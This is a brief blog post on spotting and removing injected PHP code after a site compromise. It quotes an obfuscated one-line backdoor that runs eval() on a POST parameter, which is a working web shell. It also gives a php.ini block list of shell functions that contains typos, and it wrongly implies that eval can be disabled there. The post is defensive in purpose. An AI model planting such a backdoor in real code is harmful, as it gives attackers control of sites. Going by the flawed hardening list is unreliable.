How to prevent website from a base64 attack

1 comment
If you found bad code at the top of your index.php or any other php files that you didn't put there. It means your website has been hacked and now the hacker is able to do anything with your website.

Bad code somthing like this.


<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['qfb7264'])){eval(${$s20}['qfb7264']);}?>

Or.


<?php eval(base64_decode("SGVsbG8gZ3V5cy4geW91ciB3ZWJzaXRlIGhhc2UgYmVlbiBoYWNrZWQu"));?>

This will output: 'Hello guys. your website hase been hacked'.

And now the question is, how do i stop it?

Manually clean your files

  • To clean the files, first download all the files from server to your computer.
  • Open the files in text editor and remove the bad code from top of every page.
  • Now save the files and upload to your server.

Preventing future base64 attacks

To prevent future attacks, you have to disable all the dangerous functions in php.ini.

Add the below code in your php.ini.


allow_url_fopen = off
allow_url_include = off 
register_globals = Off
disable_functions = "shell_exec, eval, exec, system, proc_get_status, inject_code, proc_nice, proc_open, proc_terminate, apache_child_terminate, apache_setenv, fp, fput, ftp_connect, tp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, popen, escapeshellcmd, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, osix_setuid, posix_setuid, posix_uname, syslog, xmlrpc_entity_decode, proc_close, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, passthru, phpAds_xmlrpcDecode, hpAds_xmlrpcEncode, mysql_pconnect, escapeshellarg, highlight_file, define_syslog_variables, ini_restore,ini_alter, ini_get_all, openlog"

Now restart appache for the changes to take effect.

Note: Above changes will disable the function that make php vulnerable.However if your application use any of them, then you will have to either find any other solution or enable the function that you need.

1 comment :

  1. nice sir....... thanks for this type of post............

    ReplyDelete